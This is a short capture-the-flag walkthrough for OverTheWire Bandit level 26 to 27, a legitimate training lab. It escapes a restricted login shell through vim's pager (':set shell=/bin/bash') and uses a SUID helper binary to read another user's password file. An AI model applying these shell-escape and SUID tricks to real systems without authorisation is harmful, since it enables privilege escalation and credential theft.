Level 27


  1. SSH into bandit26
  2. Break out of the current shell

Objective 1

  • Username: bandit26
  • Password: ssh-key
  • Port: 2220
  • IP/Hostname: bandit.labs.overthewire.org
user@localhost:~$ ssh -p 2220 [email protected] -i ssh-key


Objective 2

We connected but immediately get disconnected.

From bandit25, check the default shell for bandit26.

bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

Typical GTFOBins with vi/vim is to make your terminal as small as possible, you can then use vim to give you a shell.

user@localhost:~$ ssh -p 2220 [email protected] -i ssh-key
:set shell=/bin/bash

Now you should have a shell as bandit26.

Now we need to find bandit27.

bandit26@bandit:~$ ls
bandit27-do  text.txt

Looks like it's another SUID binary to go get the next password.

Here's what the binary tells us:

bandit26@bandit:~$ ./bandit27-do 
Run a command as another user.
  Example: ./bandit27-do id

Should be very similar to how level 20 was.

bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27